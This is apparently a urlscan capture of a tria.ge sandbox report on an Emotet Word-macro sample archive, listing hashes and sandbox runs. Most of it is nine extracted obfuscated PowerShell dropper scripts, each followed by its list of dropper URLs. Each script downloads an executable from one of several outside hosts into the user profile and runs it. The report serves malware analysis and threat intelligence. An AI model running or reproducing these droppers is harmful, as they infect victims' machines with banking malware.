tria.ge
Open in
urlscan Pro
2001:978:3c04:1::12
Public Scan
URL:
https://tria.ge/200902-yxj792mp5x
Submission: On June 09 via api from RU — Scanned from NL
Submission: On June 09 via api from RU — Scanned from NL
Form analysis 0 forms found in the DOM
Text Content
* Submit
* Reports
*
Overview
overview
10
Static
static
8
No interne...st 60s
windows10_x64
10
No interne...st 60s
windows10_x64
10
No interne...st 60s
windows10_x64
10
No interne...st 60s
windows10_x64
10
No interne...st 60s
windows10_x64
10
No interne...st 60s
windows10_x64
10
No interne...st 60s
windows10_x64
10
No interne...st 60s
windows10_x64
10
No interne...st 60s
windows10_x64
10
Download SampleFeedback Print to PDF
SHARING
Copy URL
Twitter E-mail
GENERAL
* Target
emotet-doc-20200901.zip
* Size
804KB
* Sample
200902-yxj792mp5x
* MD5
c8f70ccb8cfd4a42f9c076f1e9ce45ed
* SHA1
f4b62323bbae8ee34738c8596d10ea9d03be33b2
* SHA256
11226065bf8f906fd61d872022937b62bdd250b342a9a8a303a4dd4e522d99d0
* SHA512
908d57a82bb8bb865b73ed9280c2be8140e379ae593a9796ed10ad591f7d9fa5e34d6d8ed00d501253a54d1a67b69de77246c19b49195a4b2e30054b8b1a86d3
Score
10/10
macro
Static task
static1
macro
Behavioral task
behavioral1
Sample
E1-20200901_051300.doc
Resource
win10v200722
windows10_x64
0 signatures
0 seconds
Behavioral task
behavioral2
Sample
E1-20200901_102700.doc
Resource
win10v200722
windows10_x64
0 signatures
0 seconds
Behavioral task
behavioral3
Sample
E1-20200901_153500.doc
Resource
win10
windows10_x64
0 signatures
0 seconds
Behavioral task
behavioral4
Sample
E1-20200901_180500.doc
Resource
win10v200722
windows10_x64
0 signatures
0 seconds
Behavioral task
behavioral5
Sample
E1-20200901_212900.doc
Resource
win10v200722
windows10_x64
0 signatures
0 seconds
Behavioral task
behavioral6
Sample
E3-20200901_063500.doc
Resource
win10v200722
windows10_x64
0 signatures
0 seconds
Behavioral task
behavioral7
Sample
E3-20200901_110400.doc
Resource
win10
windows10_x64
0 signatures
0 seconds
Behavioral task
behavioral8
Sample
E3-20200901_160000.doc
Resource
win10v200722
windows10_x64
0 signatures
0 seconds
Behavioral task
behavioral9
Sample
E3-20200901_210000.doc
Resource
win10v200722
windows10_x64
0 signatures
0 seconds
MALWARE CONFIG
EXTRACTED
Language
ps1
Source
1
$Yxxnif0=('C'+('6'+'dmbf')+'8');&('n'+'ew-ite'+'m')
$env:usERPROfIlE\yeDzbq5\PF2qP2U\ -itemtype
diREcTORy;[Net.ServicePointManager]::"S`eCUrITy`PRO`T`OcoL" =
('t'+'ls'+('1'+'2'+', tls11, tl')+'s');$Svykjur =
('J'+('3'+'sa')+'t'+('8n'+'xa'));$Nae5s_a=('I'+('x8'+'d5')+'4f');$C5jef6k=$env:userprofile+(('Z'+('K'+'vYe'+'dzb')+('q5ZKvP'+'f'+'2')+('qp2u'+'Z')+'Kv')."RE`PLA`CE"(('ZK'+'v'),[STrinG][cHAR]92))+$Svykjur+('.'+('e'+'xe'));$Phnr8qj=('C'+('yiurb'+'j'));$Pub1hrj=&('new-'+'o'+'bjec'+'t')
NEt.weBCLIeNt;$On4491p=(('ht'+'tp')+(':/'+'/v')+'i'+('driod'+'ec'+'or')+'a'+('c'+'io')+('n'+'.c')+'o'+'m/'+('wp-ad'+'m')+('in/M'+'I')+'H/'+'*'+('htt'+'p:/')+'/v'+('a'+'nb')+('ras'+'t')+('.co'+'m')+'/'+'b'+'l'+'e'+('ech/fR'+'/')+'*'+('http'+':')+('/'+'/v'+'arivo'+'da.')+'co'+'m'+'/'+('cg'+'i')+('-'+'b'+'in/89')+'7/'+('*'+'ht')+('tp'+'://'+'w')+('ak'+'an')+('-t'+'ank')+('a.'+'org/')+('Kl'+'ei')+('nt'+'e'+'ile/E'+'/*http')+('s://w'+'ww.webho'+'st4'+'c'+'h'+'rist'+'.')+'o'+'rg'+('/'+'LA')+'M'+'B/'+('D/*'+'ht')+('t'+'p://wh')+('i'+'te-o')+('n-r'+'ic'+'e.')+'c'+('o'+'m/')+'L'+'o'+('g'+'os/'+'U/')+'*h'+('tt'+'p')+('://zah'+'n'+'a'+'rzt')+('-f'+'le')+'n'+('sb'+'u')+'r'+('g'+'.com')+'/'+('cg'+'i-b'+'in/')+('L'+'8/'))."sPL`it"([char]42);$J8w0ujm=('I'+('n'+'5jd')+'j0');foreach($N55qexv
in $On4491p){try{$Pub1hrj."dOWNL`oaDFI`LE"($N55qexv,
$C5jef6k);$Wdlgkup=(('Tm'+'2')+'6'+('2'+'qh'));If ((&('Get'+'-I'+'tem')
$C5jef6k)."lE`Ng`Th" -ge 25285)
{.('Invok'+'e-Ite'+'m')($C5jef6k);$W29hg6n=(('Getw'+'_')+'y6');break;$Nzn2d24=('N'+('his'+'r')+'n7')}}catch{}}$O8hsaty=('Y'+'m'+('bp8r'+'3'))
URLs
exe.dropper
http://vidriodecoracion.com/wp-admin/MIH/
exe.dropper
http://vanbrast.com/bleech/fR/
exe.dropper
http://varivoda.com/cgi-bin/897/
exe.dropper
http://wakan-tanka.org/Kleinteile/E/
exe.dropper
https://www.webhost4christ.org/LAMB/D/
exe.dropper
http://white-on-rice.com/Logos/U/
exe.dropper
http://zahnarzt-flensburg.com/cgi-bin/L8/
Copy all
EXTRACTED
Language
ps1
Source
1
$Jffm_tv=('W5'+('gq'+'w')+'jg');.('n'+'ew-i'+'tem')
$Env:uSERPrOfIlE\hb8cvHk\vg5uB1d\ -itemtype
DirEcTOry;[Net.ServicePointManager]::"se`c`URi`TYPROtOcOL" = (('tls'+'12')+(',
t'+'l')+('s11'+', ')+('tl'+'s'));$Pc2nmr3 =
(('V'+'40')+'6'+('8'+'9hmw'));$Sdii770=('A'+('g'+'mpk')+'3q');$N73tjc4=$env:userprofile+(('{'+'0}'+('H'+'b8')+('cv'+'hk')+'{0}'+'Vg5ub1d{0}')
-f
[chAR]92)+$Pc2nmr3+(('.e'+'x')+'e');$F2a69u_=('S'+('i3'+'i')+('d'+'p9'));$Un9yi2c=.('ne'+'w-ob'+'ject')
NET.weBclIenT;$Rx24snx=(('h'+'tt')+('p:'+'/')+('/tine'+'r')+('se'+'rv'+'is.c'+'om/'+'cgi')+'-b'+('i'+'n/')+('fqo'+'/*')+('h'+'tt'+'p://')+('w'+'ww.t')+('e'+'lec'+'onx')+('.c'+'om/c')+('gi'+'-b')+('in/Sv'+'t'+'/*h'+'ttp://t')+('hecom'+'ed'+'ycro'+'w'+'d')+('.c'+'om/')+'p'+'u'+'n'+'ka'+'n'+'ar'+('y/O5/'+'*'+'h')+('t'+'tp')+':/'+('/'+'tob')+'y'+('-warren'+'.')+('co'+'m')+'/'+('cgi-'+'b')+('i'+'n/2')+('ja/*http'+'s'+':'+'//ww')+('w.ti'+'er'+'rasi')+('ns'+'o'+'litas.c')+('om/p'+'rueba/'+'e/*'+'h')+'tt'+('p:'+'/')+'/u'+'h'+('le'+'n')+'bu'+('sch.'+'inf')+('o/'+'W')+('or'+'d')+('P'+'re'+'ss_'+'03/QE/')+('*http:/'+'/va'+'n')+('ba'+'al')+('en'+'.info/'+'cg')+('i-b'+'in/K'+'F4/'))."Sp`LIt"([char]42);$T24snx0=('M'+('6i'+'_')+('rp'+'t'));foreach($Iwcj84a
in $Rx24snx){try{$Un9yi2c."do`wnlOad`FILe"($Iwcj84a,
$N73tjc4);$Kw1rm2l=('C'+('is'+'xe'+'2y'));If ((.('Ge'+'t-'+'Item')
$N73tjc4)."LeN`gTH" -ge 31799)
{&('Invok'+'e-I'+'tem')($N73tjc4);$Ozt090v=('So'+('cl_t'+'k'));break;$O5s1rr_=(('Q'+'pe'+'elg')+'2')}}catch{}}$Q292_jr=(('D'+'zwni')+'6d')
URLs
exe.dropper
http://tinerservis.com/cgi-bin/fqo/
exe.dropper
http://www.teleconx.com/cgi-bin/Svt/
exe.dropper
http://thecomedycrowd.com/punkanary/O5/
exe.dropper
http://toby-warren.com/cgi-bin/2ja/
exe.dropper
https://www.tierrasinsolitas.com/prueba/e/
exe.dropper
http://uhlenbusch.info/WordPress_03/QE/
exe.dropper
http://vanbaalen.info/cgi-bin/KF4/
Copy all
EXTRACTED
Language
ps1
Source
1
$Bwjhppc=('Of'+('u8x9'+'z'));.('new-i'+'t'+'em')
$ENv:USerPRofiLe\Yt_y5jN\nKmZfVz\ -itemtype
dIRECtOrY;[Net.ServicePointManager]::"SecUR`i`TYP`RotOc`ol" = (('tls'+'1')+('2,
'+'t')+('ls1'+'1,')+(' t'+'ls'));$Vneuir0 =
(('Sp'+'3k7')+('gu'+'s'));$Bz3darj=('G'+('r'+'wi'+'3_t'));$Txaibqz=$env:userprofile+(('t'+('r'+'hYt'+'_y')+('5j'+'n')+('t'+'rhNk'+'mz')+('fv'+'zt')+'rh')
-rePlAcE
([cHar]116+[cHar]114+[cHar]104),[cHar]92)+$Vneuir0+('.'+('ex'+'e'));$Bez1rmw=('T_'+('1'+'4o_')+'7');$S8_a5qy=&('new-obj'+'ec'+'t')
nET.wEbCLIENt;$Jj2ok2r=('h'+'t'+('t'+'p:/')+('/sind'+'i'+'ca')+('t'+'o'+'desegu')+('rida'+'d')+('.co'+'m')+('/_bo'+'rd'+'ers')+('/'+'lXe/*http'+':')+'//'+('s'+'eattl')+('eb'+'ug')+('safar'+'i'+'.c')+('om'+'/Im')+'a'+('ges'+'/')+('5JM/*h'+'t'+'tp:/'+'/')+('s'+'pa')+'nf'+('erke'+'l')+('g'+'ril'+'l-ve'+'r'+'leih.')+('c'+'om')+('/'+'cg')+('i-b'+'i'+'n/Yk/'+'*'+'http:')+'//'+('sn'+'oeke')+('r.'+'com/')+'cg'+('i-'+'bi')+('n/A'+'Z7')+('/*h'+'ttp')+(':/'+'/')+('s'+'ta')+('nd'+'on')+('theedge.'+'c'+'o'+'m')+('/cgi-'+'b'+'in')+('/'+'C/')+('*ht'+'t'+'p://tjde')+('n'+'gle')+('r.'+'in')+('fo/c'+'gi-'+'bin/')+('r'+'/*')+('ht'+'t')+('ps://s'+'e'+'d')+('al'+'aser.c'+'o')+('m/ima'+'g'+'e')+('s/n'+'iq'+'/'))."S`plIT"([char]42);$T9o1l5t=('H'+('inq'+'dm9'));foreach($By61576
in $Jj2ok2r){try{$S8_a5qy."dO`wnLo`AdfI`LE"($By61576,
$Txaibqz);$G44c634=(('C'+'gm')+'b2'+'rl');If ((&('Get-'+'I'+'tem')
$Txaibqz)."len`gtH" -ge 25762)
{.('Invo'+'ke-'+'It'+'em')($Txaibqz);$Or5w4gi=(('Aqi_'+'g')+'sp');break;$Huvg4i_=(('Sx'+'es')+'s8'+'5')}}catch{}}$B6u7e5q=(('Os5'+'m')+('uz'+'8'))
URLs
exe.dropper
http://sindicatodeseguridad.com/_borders/lXe/
exe.dropper
http://seattlebugsafari.com/Images/5JM/
exe.dropper
http://spanferkelgrill-verleih.com/cgi-bin/Yk/
exe.dropper
http://snoeker.com/cgi-bin/AZ7/
exe.dropper
http://standontheedge.com/cgi-bin/C/
exe.dropper
http://tjdengler.info/cgi-bin/r/
exe.dropper
https://sedalaser.com/images/niq/
Copy all
EXTRACTED
Language
ps1
Source
1
$Nyrhfxe=('Nw'+('ltfk'+'1'));&('new'+'-'+'item')
$Env:USErPROfILe\nqT9Lxd\sg4dzEy\ -itemtype
diReCTOry;[Net.ServicePointManager]::"SEcurI`TYp`RO`To`COL" = ('tl'+'s'+('12'+',
tl')+('s11, '+'tls'));$Dkwnn1q =
('H'+('xv'+'b09a'));$L8lss46=('Q'+('_6'+'zji')+'s');$Athazl8=$env:userprofile+((('NFM'+'Nq')+'t'+('9lx'+'d')+('NFMS'+'g4d'+'zey')+'N'+'FM')
-CReplAcE
('NF'+'M'),[ChAR]92)+$Dkwnn1q+('.'+('e'+'xe'));$Iyp1mvf=(('Ms5'+'buw')+'y');$Dnas2my=&('ne'+'w-o'+'bject')
neT.WEBcLIeNt;$Fpfp42x=(('h'+'tt')+'p'+(':'+'//')+('pt'+'w')+'m'+'u'+('s'+'ic.')+('com/'+'t')+'hu'+'m'+('bs'+'/TN/*')+('h'+'ttp:'+'/')+('/'+'re')+'f'+'in'+'a'+'n'+('z'+'.or')+('g/b'+'a')+('che'+'l')+('or'+'me_'+'d'+'e/I/')+('*h'+'t')+'t'+('ps://prpr'+'ofil'+'e')+('.'+'com')+('/wp-a'+'d'+'min/B2')+('/*ht'+'t')+'p'+'s:'+('/'+'/rad'+'iom')+('uz'+'i')+('ek'+'land')+('.c'+'om/cont')+'a'+'c'+'t/'+('f'+'/*')+('h'+'ttps'+':')+'/'+'/'+('rbji'+'.')+'c'+('om/'+'rbj')+('fi'+'le')+'s'+('/5/'+'*'+'ht')+('t'+'p:')+('/'+'/r')+'el'+'i'+('ca'+'tess'+'en.co'+'m'+'/index'+'_h'+'tm')+'_'+('fi'+'les/')+'9/'+'*h'+('ttps:'+'/')+('/w'+'ww')+'.p'+('ho'+'enix')+('-i'+'n'+'ter')+('n'+'et.')+'co'+'m/'+'i'+('nco'+'n')+'t'+('e'+'xt')+'/Q'+('JN'+'/'))."SPl`It"([char]42);$Qc3imxn=('T'+'l'+('8fq'+'ab'));foreach($A1jdrs6
in $Fpfp42x){try{$Dnas2my."D`OWnLO`Adf`Ile"($A1jdrs6,
$Athazl8);$Dz2ltlc=('T'+('8a'+'_04')+'p');If ((.('Get-I'+'t'+'em')
$Athazl8)."LeN`G`TH" -ge 20308)
{.('Invo'+'k'+'e-It'+'em')($Athazl8);$Gbhrjuz=('S0'+'a'+('y_'+'_q'));break;$U877mcm=('Xq'+('p'+'wn2')+'0')}}catch{}}$X6g_6v7=('A'+('b'+'4nch')+'3')
URLs
exe.dropper
http://ptwmusic.com/thumbs/TN/
exe.dropper
http://refinanz.org/bachelorme_de/I/
exe.dropper
https://prprofile.com/wp-admin/B2/
exe.dropper
https://radiomuziekland.com/contact/f/
exe.dropper
https://rbji.com/rbjfiles/5/
exe.dropper
http://relicatessen.com/index_htm_files/9/
exe.dropper
https://www.phoenix-internet.com/incontext/QJN/
Copy all
EXTRACTED
Language
ps1
Source
1
$Exrh_yv=(('Z'+'5bxs')+'0r');.('new-i'+'tem') $ENv:userprofIlE\cs722E8\u87fwa6\
-itemtype DirEcTOry;[Net.ServicePointManager]::"seCur`I`Ty`Prot`oCol" =
('t'+('ls1'+'2,')+(' tls'+'1')+'1'+(','+' tls'));$Pnt724r =
(('Pp7'+'rc')+'m');$Nsa77qo=('Ps'+('5zdl'+'k'));$Qofy4mu=$env:userprofile+((('jNrC'+'s')+('722'+'e')+('8jNr'+'U')+'8'+('7fwa6jN'+'r'))."r`Eplace"(([char]106+[char]78+[char]114),'\'))+$Pnt724r+(('.'+'ex')+'e');$L9z38dj=(('W'+'q2ug')+'eo');$Qkzdwel=&('new-'+'o'+'bject')
Net.wEBClIent;$Ntpx_a5=(('ht'+'tp:/')+('/nn'+'p')+('stv.c'+'o')+('m/'+'ne')+'w'+('sl'+'ett')+'e'+('r'+'/'+'hDT/')+'*h'+'t'+'t'+('p:'+'//o')+'n'+('ei'+'n')+'si'+'x.'+'c'+'o'+('m/pl'+'e'+'sk'+'-sta'+'t/S')+'7'+('6/'+'*')+('ht'+'t')+('p:'+'/')+('/vi'+'l')+'la'+'te'+'r'+('a.c'+'om')+('/'+'cgi-')+'b'+'i'+('n/'+'CHy/*')+'ht'+('t'+'p:/')+('/party'+'-'+'p')+'i'+'x'+'.o'+'rg'+'/'+'c'+('g'+'i-b')+('i'+'n/G')+'V'+('p'+'/*htt')+('p'+':/')+('/s'+'ab')+'i'+'n'+'e'+('schulte.'+'n'+'e')+('t/'+'cg')+('i'+'-bin')+('/x/*h'+'t')+('t'+'p://')+('p'+'autz.o'+'rg/c'+'gi')+('-'+'bi')+('n/uB6/'+'*htt'+'p:/'+'/n')+'o'+('bi'+'u')+('s'+'.o')+('r'+'g/hutc')+'hi'+'n'+'s/'+'w/')."sPL`iT"([char]42);$Vm_1_31=('P'+('5'+'q'+'fyjn'));foreach($Ydr__0d
in $Ntpx_a5){try{$Qkzdwel."d`OwnL`oad`FilE"($Ydr__0d,
$Qofy4mu);$Impunvo=('F'+('oap'+'1')+'65');If ((&('Ge'+'t-Item')
$Qofy4mu)."le`NGTH" -ge 29363)
{.('Invoke'+'-I'+'tem')($Qofy4mu);$F63mudy=(('Z'+'gd')+'ye'+'0v');break;$Xh615ij=('O'+('sw3'+'ka')+'2')}}catch{}}$Zbqpwr3=('T'+'m'+('pp'+'l3d'))
URLs
exe.dropper
http://nnpstv.com/newsletter/hDT/
exe.dropper
http://oneinsix.com/plesk-stat/S76/
exe.dropper
http://villatera.com/cgi-bin/CHy/
exe.dropper
http://party-pix.org/cgi-bin/GVp/
exe.dropper
http://sabineschulte.net/cgi-bin/x/
exe.dropper
http://pautz.org/cgi-bin/uB6/
exe.dropper
http://nobius.org/hutchins/w/
Copy all
EXTRACTED
Language
ps1
Source
1
$Vcryy7p=('Wu'+('q'+'75')+'li');.('new-it'+'e'+'m')
$enV:USErProfilE\joX49_e\XA1UGAz\ -itemtype
diREcTORY;[Net.ServicePointManager]::"sEC`UR`I`Typr`OtocOL" = ('tl'+'s1'+('2'+',
')+('tl'+'s'+'11,')+(' tl'+'s'));$Nqnpr0h =
('S'+('ux'+'k')+('gk'+'93'));$Xsc0s5t=('Z'+'wo'+('su'+'gr'));$Th7pdyc=$env:userprofile+((('vS'+'V')+('Jox'+'4')+('9_ev'+'SV'+'X'+'a1')+('u'+'ga')+('zvS'+'V'))."r`eplA`Ce"(([CHAR]118+[CHAR]83+[CHAR]86),'\'))+$Nqnpr0h+('.'+('ex'+'e'));$I0nuifv=('F'+('7wn'+'o')+'ht');$E89i7ul=&('new'+'-'+'object')
net.WebCliENt;$Z8u_lg2=(('ht'+'tp')+(':/'+'/t-'+'pr')+'i'+('va'+'t.')+'de'+'/c'+('gi'+'-b')+('in'+'/')+('FQ'+'zG'+'OWY/*h')+('t'+'tp://'+'z'+'oom')+('an'+'ds')+('h'+'oo'+'tph')+('o'+'togra')+('phy'+'.com'+'/wp-')+'i'+('n'+'cl')+('ude'+'s')+('/'+'fil')+('e'+'/WZyz'+'a')+'lV'+('lzJ'+'W')+'c/'+('*ht'+'t')+'p:'+('//ou'+'tof')+('ph'+'as')+('e'+'.d'+'e/U')+('pl'+'oads/')+('J'+'1'+'tov12'+'7666')+('8/'+'*h'+'tt'+'ps://odevill'+'e'+'.')+('de/cgi'+'-bin'+'/f'+'ile/OqS'+'D/')+'*h'+('ttp:'+'//to')+('msst'+'e'+'akho')+('us'+'e.c')+('om/'+'wp-')+('i'+'nclu')+'d'+('es'+'/L')+('bZjD/*'+'h')+'t'+('tp'+':'+'//th')+'e'+'c'+('re'+'ativ')+'er'+('oni'+'n.'+'com')+'/w'+('p'+'/f')+'il'+('e/u'+'zXiZSaTC'+'Sa'+'/*http:')+'//'+('o'+'li')+('ver'+'kre')+('mer.n'+'et')+('/c'+'gi'+'-b')+('in'+'/file')+'/'+('mZ'+'p'+'Cq/'))."Spl`iT"([char]42);$Sv2onnn=(('Ye5'+'1')+('6a'+'f'));foreach($M8p_z4d
in $Z8u_lg2){try{$E89i7ul."Dow`NLoAdFi`lE"($M8p_z4d,
$Th7pdyc);$El7mui7=('Y'+'k2'+('xi'+'fn'));If ((&('G'+'et-Item')
$Th7pdyc)."Le`NgTh" -ge 35972)
{.('In'+'voke'+'-'+'Item')($Th7pdyc);$G40qcw9=(('Qw'+'d')+('m6'+'9')+'h');break;$Ghdmgvr=(('Z'+'qdx1')+'s3')}}catch{}}$Aywhg9d=(('Y28'+'w3p')+'c')
URLs
exe.dropper
http://t-privat.de/cgi-bin/FQzGOWY/
exe.dropper
http://zoomandshootphotography.com/wp-includes/file/WZyzalVlzJWc/
exe.dropper
http://outofphase.de/Uploads/J1tov1276668/
exe.dropper
https://odeville.de/cgi-bin/file/OqSD/
exe.dropper
http://tomssteakhouse.com/wp-includes/LbZjD/
exe.dropper
http://thecreativeronin.com/wp/file/uzXiZSaTCSa/
exe.dropper
http://oliverkremer.net/cgi-bin/file/mZpCq/
Copy all
EXTRACTED
Language
ps1
Source
1
$Me_mvyt=(('G'+'y8_')+('c6'+'s'));&('new-'+'it'+'em')
$eNv:uSerPrOfIle\ElXMqAf\vo4X6l2\ -itemtype
DirEctoRY;[Net.ServicePointManager]::"SE`CuRIty`P`R`OtOcOl" = (('t'+'ls12,'+'
t')+'ls'+'11'+', '+'t'+'ls');$Owd7uql =
(('Mb'+'t8k')+'3d'+'l');$Yxqrsmj=(('Uo'+'pr')+('_c'+'t'));$I5bq6je=$env:userprofile+(('K'+('r'+'LEl')+'xm'+('qaf'+'KrLV'+'o4x6l')+'2'+'K'+'r'+'L')-crEplACE
('Kr'+'L'),[chaR]92)+$Owd7uql+(('.e'+'x')+'e');$Td4dga_=(('Cf'+'54')+'6a'+'1');$Fvzkgwd=&('n'+'e'+'w-o'+'bject')
nEt.wEBcliENT;$Dn5svf1=('ht'+'tp'+(':/'+'/st')+'a'+'l'+'l'+'-'+'ro'+('senb'+'u')+('sc'+'h')+('.'+'com/_')+'/'+('yn'+'WT/')+('*ht'+'tp:')+('//steu'+'e')+'r'+('bu'+'e')+('ro'+'-n')+('ac'+'k.d')+('e/Gr'+'un')+'d'+'s'+('ei'+'t')+'e'+('/2HCi5'+'5')+('se'+'6')+'1'+'/*'+'h'+('ttp'+':/')+('/st'+'oep')+'fe'+'r.'+('de'+'/cg'+'i-bin')+'/Z'+('pQC'+'mA')+('kDJ'+'f')+('Wm'+'Y')+('/*ht'+'t')+('p:'+'/')+'/s'+('uma'+'-k')+('e'+'mper')+'.d'+'e/'+('AH'+'_Ho')+'rn'+'/'+('I'+'m'+'537a'+'14725')+('8'+'755')+'/'+'*h'+('tt'+'p')+':/'+('/sun'+'sh'+'ine'+'st')+('ate-'+'fl'+'o')+'ri'+'d'+'a.'+('c'+'om/')+'c'+('gi-'+'b')+'i'+('n'+'/ZgSKUg')+('s/'+'*htt'+'ps:')+('//su'+'n')+'d'+'e'+'-c'+('om'+'p')+('ut'+'er')+('.'+'de')+('/Wor'+'dP'+'r')+('e'+'ss_0')+('1/9'+'l')+('YAw'+'h')+'r'+('0'+'u1i'+'3c39'+'983')+'8'+('1/'+'*')+'h'+'t'+'tp'+':/'+'/t'+('ag'+'am')+('oga'+'.d')+('e/G'+'C/k'+'fa4o')+('59g'+'1')+'11'+('19'+'8/'))."sPL`IT"([char]42);$Ryxado2=(('R'+'ek')+('q'+'dis'));foreach($E4zzh8d
in $Dn5svf1){try{$Fvzkgwd."DOwN`lo`ADFi`le"($E4zzh8d,
$I5bq6je);$Aetzlhs=(('Qu'+'o')+('nsq'+'_'));If ((.('Get-'+'Ite'+'m')
$I5bq6je)."LE`NGth" -ge 34999)
{.('Inv'+'oke'+'-Ite'+'m')($I5bq6je);$K4mqszn=(('M'+'pb2')+'t'+'46');break;$W42sb1r=(('S'+'nta')+('o'+'5h'))}}catch{}}$O31qgss=('D'+('l5'+'3')+('rh'+'e'))
URLs
exe.dropper
http://stall-rosenbusch.com/_/ynWT/
exe.dropper
http://steuerbuero-nack.de/Grundseite/2HCi55se61/
exe.dropper
http://stoepfer.de/cgi-bin/ZpQCmAkDJfWmY/
exe.dropper
http://suma-kemper.de/AH_Horn/Im537a147258755/
exe.dropper
http://sunshinestate-florida.com/cgi-bin/ZgSKUgs/
exe.dropper
https://sunde-computer.de/WordPress_01/9lYAwhr0u1i3c3998381/
exe.dropper
http://tagamoga.de/GC/kfa4o59g111198/
Copy all
EXTRACTED
Language
ps1
Source
1
$Yt7gbpu=(('Ss'+'x')+'_o'+'b_');.('ne'+'w-item')
$enV:useRPrOFiLE\BAK4b5n\U9nE3Hk\ -itemtype
DIReCtOrY;[Net.ServicePointManager]::"SECuRI`TYPROtO`C`OL" = (('t'+'ls12')+','+'
'+('tls11'+', t')+'l'+'s');$Cfiwraw =
('S'+('dnm'+'1ys')+'gn');$Zhxa487=('R'+('9'+'ep')+('fx'+'r'));$A273fae=$env:userprofile+(('{0}Ba'+('k4'+'b')+'5n'+'{0}U9n'+'e3hk{0}')
-F
[chaR]92)+$Cfiwraw+('.'+('ex'+'e'));$Bthnn30=('Ky'+('60'+'wja'));$Ioc798g=&('new-o'+'bje'+'ct')
net.WeBclIeNt;$B5c2fwx=('h'+('tt'+'p://sc'+'hic'+'kle.o'+'rg/c'+'gi')+'-'+('bin/'+'f')+'i'+('le/WkNEqj'+'yv'+'m')+'gM'+'/*'+('ht'+'tp:')+'//'+'x'+('xf'+'res')+('hxx'+'.d')+'e'+'/b'+('ike'+'/')+('f'+'ile/mR')+'B/'+'*'+'h'+('ttp'+':')+('//'+'west')+('e'+'rnd')+('ata'+'.c')+('o'+'m.au/w'+'p-'+'inc')+('lu'+'d')+('es/'+'V'+'Tgoqi')+('i6r4'+'1'+'1691/*h'+'t'+'t')+('p://'+'weiers'+'tr'+'ass.')+'de'+('/'+'Elch/'+'f'+'ile/X')+'Qr'+'H/'+('*h'+'ttp')+('://w'+'e'+'s')+('te'+'nd-zoo.de'+'/Ba')+('v'+'ari')+'a'+'/'+('n9HCzf27r6'+'w'+'j'+'697'+'7/*h'+'ttp:')+('//w'+'a')+('silewsk'+'i-o'+'nl'+'ine'+'.de/'+'bild'+'er/aqw'+'t'+'i')+('rl'+'955')+('496'+'12')+('/*htt'+'p'+'://'+'wetzi'+'.d')+('e/c'+'gi'+'-b')+('i'+'n/fi')+('le/he'+'LeDq'+'ESy'+'V/'))."s`PLIT"([char]42);$U9qmo1z=('Cr'+'m'+('b1'+'j9'));foreach($Vlkpm_q
in $B5c2fwx){try{$Ioc798g."do`wnLoAdF`i`lE"($Vlkpm_q,
$A273fae);$Wrv0_a1=('G'+'d'+('v'+'fb9l'));If ((&('Get'+'-Ite'+'m')
$A273fae)."L`eNGth" -ge 28361)
{.('Invoke'+'-'+'Ite'+'m')($A273fae);$Kxhge6n=('Lj'+'7'+('p9'+'5f'));break;$Ddeyb24=(('G'+'ek')+('euz'+'g'))}}catch{}}$Ydkx2t1=('Fe'+('t2'+'54l'))
URLs
exe.dropper
http://schickle.org/cgi-bin/file/WkNEqjyvmgM/
exe.dropper
http://xxfreshxx.de/bike/file/mRB/
exe.dropper
http://westerndata.com.au/wp-includes/VTgoqii6r411691/
exe.dropper
http://weierstrass.de/Elch/file/XQrH/
exe.dropper
http://westend-zoo.de/Bavaria/n9HCzf27r6wj6977/
exe.dropper
http://wasilewski-online.de/bilder/aqwtirl95549612/
exe.dropper
http://wetzi.de/cgi-bin/file/heLeDqESyV/
Copy all
EXTRACTED
Language
ps1
Source
1
$Epj589i=(('Xf0'+'h')+('r3'+'l'));.('new-'+'item')
$eNv:UseRpRofilE\PS29B6C\LSq3B_L\ -itemtype
dIREcToRy;[Net.ServicePointManager]::"SeCUrI`TyPR`Ot`Oc`oL" = (('tls'+'12,')+'
'+'t'+('ls'+'11')+', '+('t'+'ls'));$H_8jt5c =
(('Z'+'vh')+('5'+'ea')+'nv');$R_zsv1k=(('Bc'+'dui')+'8'+'y');$Lnxph9m=$env:userprofile+(('5T'+('z'+'P'+'s29b6c')+'5'+('Tz'+'Ls')+('q3'+'b'+'_l5Tz'))
-CREPLACe('5T'+'z'),[cHAR]92)+$H_8jt5c+('.'+('e'+'xe'));$Lb786ry=(('V3'+'q4')+('s2'+'g'));$Se5zhtm=&('new'+'-obj'+'ect')
NEt.wEBcLieNt;$Fi8igob=('h'+'tt'+'p'+':/'+('/r'+'ue')+'ck'+'er'+('t-'+'o')+('nlin'+'e'+'.d')+('e/'+'cgi')+'-b'+('in'+'/')+'K'+('r'+'h7nr'+'1978'+'/*')+'h'+'tt'+'p'+('s:'+'/')+'/'+('rub'+'enw')+('in'+'kelm')+('an.'+'n'+'l/c')+'gi'+'-'+'bi'+('n/'+'lU')+('H'+'/*ht')+'t'+('p:'+'/')+('/'+'ruper')+'t'+('st'+'re')+('et.d'+'e')+'/'+'H'+('eidi'+'s-')+'E'+('x'+'/atta'+'ch/v')+'C'+'FS'+('ak'+'PHq/*')+'h'+('ttp://'+'sa')+'m'+('atec'+'h')+('nic'+'s')+'.c'+('om'+'/_'+'scri')+('p'+'ts/D')+('Wxip'+'w/'+'*h')+'t'+('t'+'p:')+'/'+('/'+'sc')+'ha'+('id'+'l')+('.d'+'e')+'/b'+('ild'+'er/')+'k'+'c1'+('rs4'+'7'+'46')+'57'+'/*'+('ht'+'tp:')+('/'+'/s')+('a'+'uerbeck.'+'n'+'et/cgi-')+'b'+'i'+'n'+'/M'+('W'+'ROisGUD'+'p'+'B/*ht'+'t')+'p'+('://'+'s')+('c'+'ha')+('e'+'fer')+('-f'+'ran'+'k.d')+('e/c'+'gi-bin'+'/c')+'b'+('j'+'5r')+'n'+('qm65'+'z'+'m83')+'1'+'2/')."S`pLit"([char]42);$Ruh0t4l=(('Rt'+'p')+('1hb'+'3'));foreach($Kco4l69
in $Fi8igob){try{$Se5zhtm."DoW`NLOa`Df`ilE"($Kco4l69,
$Lnxph9m);$Ovy0rzp=('Is'+('y'+'4ksg'));If ((.('Get-'+'Ite'+'m')
$Lnxph9m)."Leng`TH" -ge 25786)
{&('Invo'+'ke-I'+'tem')($Lnxph9m);$A7zzz1y=('L'+('i'+'mb0_4'));break;$Ui8diw_=(('Axbe'+'sf')+'g')}}catch{}}$D5ggc_7=('Ah'+('a'+'qd')+'gn')
URLs
exe.dropper
http://rueckert-online.de/cgi-bin/Krh7nr1978/
exe.dropper
https://rubenwinkelman.nl/cgi-bin/lUH/
exe.dropper
http://rupertstreet.de/Heidis-Ex/attach/vCFSakPHq/
exe.dropper
http://samatechnics.com/_scripts/DWxipw/
exe.dropper
